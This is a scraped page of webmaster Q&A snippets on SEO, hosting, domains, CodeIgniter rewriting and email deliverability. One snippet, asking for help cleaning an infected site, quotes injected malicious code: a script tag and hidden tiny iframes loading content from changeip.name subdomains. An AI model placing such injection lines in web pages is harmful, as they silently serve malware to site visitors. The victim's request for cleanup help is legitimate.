Search Results

Search found 14789 results on 592 pages for 'pro backup'.

Page 205/592 | < Previous Page | 201 202 203 204 205 206 207 208 209 210 211 212  | Next Page >

  • What are some good services for brainstorming domain name ideas? [closed]

    - by Clay Nichols
    Possible Duplicate: Is there a domain search tool on the web that works well? I've run across a few of these but can't remember them right now (and I've probably missed a few good ones). The idea is that you provide some input (a word(s)) and it comes up with synonyms, rhyming words, etc. Ideally, I'd want to have some confidence that they aren't just registering all the domains I come up with.

    Read the article

  • Fix 403 errors in Google Webmaster Tools

    - by Justin
    Hi Team, I have a domain that has "fallen off a cliff" for searches in Google. Searches that used to be in position 1-4 are now gone from page 1. The same search in Bing shows the typical position expected (top 5 results). In reviewing Google Webmaster Tools, I am seeing two problems: 1. The Sitemap is reporting two errors: General HTTP error: HTTP 403 error (Forbidden) URLs not accessible However, the URL they provide as "no accessible" is accessible. I can click the link Google provides and it works fine. There are 6,000 crawl errors of type 403. Again, most of these pages that have 403 are accessible in my browser (tried various browsers as well). About half are from January, the other half from November. There are no IP-specific firewall rules on ports 80 and 443 that could block the goolgebot Using the user agent switcher add-on for FF I confirmed that the page loads when the user agent is the googlebot I an confirm that most of the pages reported as 403 are accessible. A search of just "site:thedomain.com" does confirm there are over 9,000 in the index. But most searches don't return the site. I believe the 403 issues are the cause of the fall in search rankings, but I can't seem to find any information online with ideas about how to address this. Any ideas? jpe

    Read the article

  • What Ranking Factors Are Used For International Search?

    - by Itai
    Google.com vs Google.ca vs Google.co.uk (etc) all rank their results differently. The intention is to return more locally-relevant content. What factors, other than the ones below, are used to determine local relevancy? I already know the TLD (.com, .ca, etc) and likely the server IP address is used but there has to be more as this would not explain some search results I noticed this week. Particularly, I see a US-based site ranking #3 for some keywords on Google.com, ranking #5 on Google.ca and not ranking within the first pages on Google.co.uk. On Google.com it outranks a Australian site which outranks it on Google.ca. The site itself is relevant for all English-speaking locations and it being outranked by sites from different regions on different Google TLDs (but not ones from the same region as the TLD).

    Read the article

  • Solution for payment gateway with multiple sellers

    - by pvieira
    I'm looking for a payment gateway that can be used in a website with multiple sellers. Let's say that depending on the purchased item, a given seller/merchant should receive the money. Would that be possible using only one "master merchant" account that would act as a "distributor" of funds for several "sub-merchants"? Does any well established privider (paypal, worldpay, auth.net, etc) supports this?

    Read the article

  • Problem with homepage's SEO when using subfolders in a multi language website

    - by Antonio
    After watching a hundreds of threads about multilanguage website I haven't found an answer to my specific problem, so I think its not a common issue and I must have done something terribly wrong ;-) We have a brand.com website in DE main language and the following subfolders: /de/ = canonical of / + redirect to / /it/ /en/ When I crawl google.com for EN keywords or google.it for IT keywords then I get as results the homepage in German language (both title and description) as the top result with no trace of the /it/ or the /en/ homepage. Is this because /it/ and /en/ both needs a separate link building strategy? I've already configured Google webmaster tool into the following way: brand.com, no language preference brand.com/de/, de language brand.com/it/, it language brand.com/en/, en language Perhaps having "/" as DE main page is it wrong and I should use a different approach? i.e. like having "/" to be a 301 to /de/ instead ? Thanks in advance.

    Read the article

  • How to Avoid Duplicate Content in Wordpress Ecommerce Store

    - by Bhanuprakash Moturu
    hi i run a word press eCommerce store powered by woo commerce . i have a large inventory of products most of the product description is same for all products and its mandatory to include it. its creating a large duplicate content on site each category have 6 products i thought of a solution can you suggest which one is good 1 no index and follow product page and link it to categories page using canonical tag 2 index and nofollow product page and link it to categories page using canonical tag which is the best solution and is it a good practice to use canonical tag to link to categories page

    Read the article

  • Domain forwarding to a IE "trusted site" opens a blank page

    - by Michael Jasper
    My employer, a University, regularly hosts conferences and other events. While websites for these sites are hosted on our domain, they frequently request customized .com urls. We then forward these domains to the specific site. Recently, we discovered a problem, where a page will not load if the following conditions are met(using a current example): website is created on our CMS for a conference http://continue.weber.edu/nulc a domain is created http://www.nulc2012.com and forwarded to http://continue.weber.edu/nulc The user enters http://www.nulc2012.com into their address bar using IE7 or IE8 The user has *.weber.edu listed as a "trusted site" in IE security settings (the case for nearly all on-campus computers) When this happens, their browser will correctly transfer to the page http://continue.weber.edu/nulc/index.php, however the page is blank, returning only: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content="text/html; charset=windows-1252" http-equiv=Content-Type></HEAD> <BODY></BODY></HTML> Is there any know solution to this problem? Or am I missing something completely? Note: Tested websites do load correctly in Chrome, Firefox, and Safari

    Read the article

  • My Flex 3 Website Doesn't Have Any Keywords Listed in Google's Webmaster Tools

    - by Laxmidi
    Hi, I've got a Flex 3 website. When I in Google's webmaster tools - Your site on the web - Keywords, none are listed. Does anyone have an all-Flex site that has keywords listed for it the above? The sites been up for about a month. It's been indexed by Google. I have keyword metatags in the site, which from what I've read Google ignores. Where does google come up with the keywords for your site? Any suggestions on what I need to do? Thank you. -Laxmidi www.brainpinata.com

    Read the article

  • How to write good blog post tags

    - by keruilin
    It seems that you have three choices in deciding how you write tags for your blog posts: Make them user friendly Make them highly searchable Combo of the two For example, let's say that I have a blog post that has write-ups on the top 10 ipad apps for business travel (e.g., Evernote, Dragon Diction, Instapaper, etc.). User friendly tags: ipad apps, business travel Searchable keywords (analyzed with Google Keyword Analyzer): ipad apps, ipad travel apps, evernote ipad, instapaper, instapaper ipad Combo: ipad apps, ipad travel apps So my question comes down to this: which is really the best choice -- 1, 2 or 3? Note: this visible post tags will also serve as the meta keywords for the post page.

    Read the article

  • How to get users to commit and collaborate to make a website valuable? [closed]

    - by AzizAG
    I own a website that requires a fairly largish amount of users to collaborate and commit occasionally to make the website valuable, so basically, the website can't be any valuable without users helping me put some content on it. To not get confused, I'm thinking of websites like Wikipedia, Stack Exchange and Yahoo! Answers, most of the content is based on peer effort. How do they actually get users interested and committed in the first place? What are the things I have to do to get users involved in the website and actually help me grow it bigger?

    Read the article

  • Maximum file size for iFrame in IE7

    - by Peter Turner
    I've got a "super secure" javascript downloader* that I wrote, and it usually works alright. But I noticed, while trying to download a 90 meg file with it on a client's machine that on IE7, it's getting hung up about 1/3rd of the way through. I've never tried to send a file that large through the iFrame and it works fine in other browsers. Is there a size restriction on files that IE7 can read in an iFrame? * It's really just a PHP line that sets header("location: http://someplace/downloadbigthing.exe"); after it does some logging and verification.

    Read the article

  • .htaccess do not work without index.php on CodeIgniter

    - by Mattia
    I have read a lot of topic with the same problem but I do not find the solution. I have a LAMP into Ubuntu server. My document root is /home/utente/ into this dir I have another dir (turni) with a CodeIgniter web app. The web app works fine with the index.php into the URL, but I want to eliminate it. I have this configuration: config.php into CodeIgniter: $config['index_page'] = ''; .htaccess: RewriteEngine On RewriteBase / RewriteCond %{REQUEST_URI} ^system.* RewriteRule ^(.*)$ /index.php?/$1 [L] RewriteCond %{REQUEST_URI} ^application.* RewriteRule ^(.*)$ /index.php?/$1 [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php?/$1 [L] /etc/apache2/sites-available/default: <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /home/utente <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory /home/utente/> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> When I open a link of the web app without index.php into the URL, the server show me this error: The requested URL /turni/auth/login was not found on this server. Why? If I put the index.php like /turni/index.php/auth/login all works fine.

    Read the article

  • building a sms web application [closed]

    - by ramesh babu
    Possible Duplicate: How to add SMS text messaging functionality to my website? I would like to build a web application the purpose of the web site is to send and receive sms. I was researched so much but I didn't understood what are the requirements. simply i want he application similar to way2sms.com. and I dont want to buy sms from a company. I would like to build my own infrastructure. I have web designing stuff. I would like to know what are the requirements to send recieve sms and what is the infrastructure do i need to do it.

    Read the article

  • Why not AJAX'ify entire websites?

    - by Anonymous -
    Is there any solid reasoning as to why sites shouldn't be developed with ajax functionality that loads major parts of each part (assuming there are elements like the header, navigation etc that remain the same)? Surely it would be less resource-intensive since the server wouldn't have to serve content that appears on every page, benefiting both the host and end-user. Answer the question taking into consideration: The sites javascript behaviour degrades gracefully in every instance For my question I'm talking about new sites where this behaviour could be implemented rather from the off, so it doesn't technically cost any money - we're not returning to a finished product to implement it.

    Read the article

  • What is more preferable, Creating dedicated domains for mobile apps that shares different content or associate them with folders in one domain?

    - by Abdullah Al-Khalidi
    I want to consult you in an SEO matter which i am completely lost with, I've built a social mobile application that allows users to share text content and made all the content that appears on the application available via the web through dedicated links, however, those links cannot be navigated through the website but they are generated when users shares content through the app to social media networks. I've implemented this method on three applications with totally different content, and I've directed all generated URLs to be from the main company website which is http://frootapps.com so when users shares something, the url will change to http://frootapps.com/qareeb/share.aspx?data=127311. My question, which one is more preferable, a dedicated website for each app that uses such method? or it is ok to keep doing it the same way I am doing it?

    Read the article

  • I'm using a shared server, and as such Gmail marks my email as spam (all from headers are different from the same IP)

    - by chipperyman573
    I have a shared server, meaning many people share the same IP. When I send an email, the @website.com is different from someone else that shares the same IP with me, therefore Gmail marks it as spam. For example: My website's IP is 1.2.3.4. My website is mywebsite.com Person 2's website's IP is hosted by the same host, and as such their IP is 1.2.3.4 Person 2's website is person2.com. When they send an email, it gets sent from [email protected] When I send an email, it gets sent from [email protected] According to Gmail's spam thing: "Use the same address in the 'From:' header on every bulk mail you send." Again, the only similarities between our websites is the IP. However, this causes Gmail to mark both our mail as spam. Is there a way to sort this out with Gmail?

    Read the article

  • How to remove this malware

    - by muratto12
    Some files in my site contains some extra lines. After I've deleted them manually, I find them corrupted again some time later. it is all coming from http://*.changeip.name/ some js files. How can I remove them? <!--pizda--><script type='text/javascript' src='http://m2.changeip.name/validate.js?ftpid=15035'></script><!--/pizda--> <iframe src=http://pizda.changeip.name/?f=1065433 framebor der=0 marginheight=0 marginwidth=0 scrolling=0 width=5 heigh t=5 border=0> <iframe src=http://kuku.changeip.name/?f=1065433 framebord er=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height =5 border=0>

    Read the article

  • Point domain to 3rd Party DNS

    - by PhilCK
    I have a few of domain names and a rather simple website (small company type thing). We are in the process of having a web designer create a new website for us, but I don't want to give access to the control panel for the domain names (and have no way to limit it, it seems), while at the same time I don't want to be the go between guy for it the settings. Is there a way or a service for me to point the domain's at a 3rd party DNS system, that I can then give access for the web designer, without worry that he can find my personal info or try and transfer my domain out. Thanks.

    Read the article

  • How can I host a website on a dynamically-assigned IP address?

    - by nick
    I recently upgraded my internet to the point that it is much faster and more reliable than my current webhost. I would like to move my current domain to be hosted at home, but my IP address is dynamic. As far as I know, I only get a new IP when I restart my modem and or router (which is almost never) or when cable one (my ISP) pushes out a firmware update (rarely). There are a few ways I can see doing this: Convince my ISP to give me a static IP Assign my router my current IP to force a static IP (which might work?) Set my DNS record to my current IP address and update it on the rare occasions that it changes. Obviously I'm hoping that the first one works, but I don't want to pay a lot of extra money (if that's what it takes) to get a static IP address. Which of these options will work most reliably?

    Read the article

  • Streaming audio from a webpage

    - by luca590
    I want to be able to stream audio from another webpage through mine, but i do not know how to find the url for each audio file located on a separate webpage. It would also be extremely helpful to do everything in bulk so instead of writing a separate line of code for each audio file, simply writing a few lines of code to upload links to 100 audio files, etc. I am also using Ruby on Rails for my webpage. How do you find a file located on a separate webpage? Does anyone know, if possible how, to upload file links in bulk?

    Read the article

  • How should I deal with user agent parsing in logs?

    - by Mr. Jefferson
    My web app project includes logging functionality so we can see where visitors are coming from (referrer URL), what the popular user agents are, what pages are most popular, etc. The log is stored in SQL Server, and when I query the user agents I use a large (almost 100 lines) and growing CASE statement to separate the user agents using string matching (i.e. if the user agent contains the string "Firefox/9" then it's Firefox 9). Is there a better way to do this so I don't have to continually add to that CASE statement to deal with new browser releases? Also, how should I deal with less common, weird/unknown user agents? I've seen the following in the logs and been unable to find good information online about what they are: WordPress/3.3.1; http://www.facecolony.org Mozilla/4.0 ( http://www.hairirons.org redips; <a href=http://hairirons.org/>chi hair iron</a>) I'd guess they're bots/crawlers, but the sites they point to don't appear to reference web crawlers (or even be available sometimes). I've seen other user agents aren't familiar to me, but I know they're bots because they include "bot" or "spider" or something similar in them.

    Read the article

  • How long does it take for Google to re-index pages or update the link titles?

    - by ElHaix
    On one of our classified sites, when doing site:[mysite.com] in Google, the link text is simply [product name] - [mysite.com], where as it should read [product name] classifieds for sale in... I suspect that the site map may have been submitted when we just had [product name], and updated the page titles later. However, it has been a couple of weeks that I have confirmed the longer page titles, and still they appear shortened in organic results. How can I get this looking right in Google's organic results?

    Read the article

  • how to save a png as a smaller file but the same resolution?

    - by Radek
    not sure what stackexchange site is the best for this question. I have a scanned jpg file with below properties and size 8.5MB pixel dimension: 2468 × 3484 pixels print size: 208.96 × 294.98 millimeters resolution: 300 × 300 ppi I need to save the file as png while the size cannot be bigger than 4MB. The most important is that the size of picture must remain the same. I mean that the object size in the picture must stay the same. Could anybody tell me what is used to define the size of the objects in the picture?

    Read the article

  • jQuery mobile List-View is not working after adding some jquery code [closed]

    - by Kaidul Islam Sazal
    I am using jquery mobile and I have an array makeArrayin jquery and I have created few listview by the values of the array.Everything works fine.But the jquery mobile list-view style is not shown. Rather it is shown an ordinary list view. This is my code: $(document).ready(function(){ var url = "inventory/inventory.json"; var makeArray = new Array(); $.getJSON(url, function(data){ $.each(data, function(index, item){ if(($.inArray(item.make, makeArray)) == -1){ makeArray.push(item.make); $('.upper_case') .append('<li data-icon="list-arrow"> <a href="trade_form.php?='+ item.make +'"><img src="images/car_logo/buick.png" class="ui-li-thumb"/>' + item.make + '</a></li>'); } }); }); });

    Read the article

  • Lost Traffic from Google Because of Meta-tag Adding

    - by Marian
    I have a site aroundnails.com. It has English version on subdomain en.aroundnails.com. Reading about language related meta-tags for Google, I have placed such a meta tag on the main page of main site: <link rel="alternate" hreflang="en" href="http://en.aroundnails.com/" /> By this way I have tried to say Google, that my site on en.aroundnails.com is the english version of main site, not a duplicate. After a fortnight I have lost a huge part of traffic from Google, more than a half. At the beginning of September I have moved this meta-tag, but traffic remained at the same level. Hope somebody can help me to solve this issue.

    Read the article

< Previous Page | 201 202 203 204 205 206 207 208 209 210 211 212  | Next Page >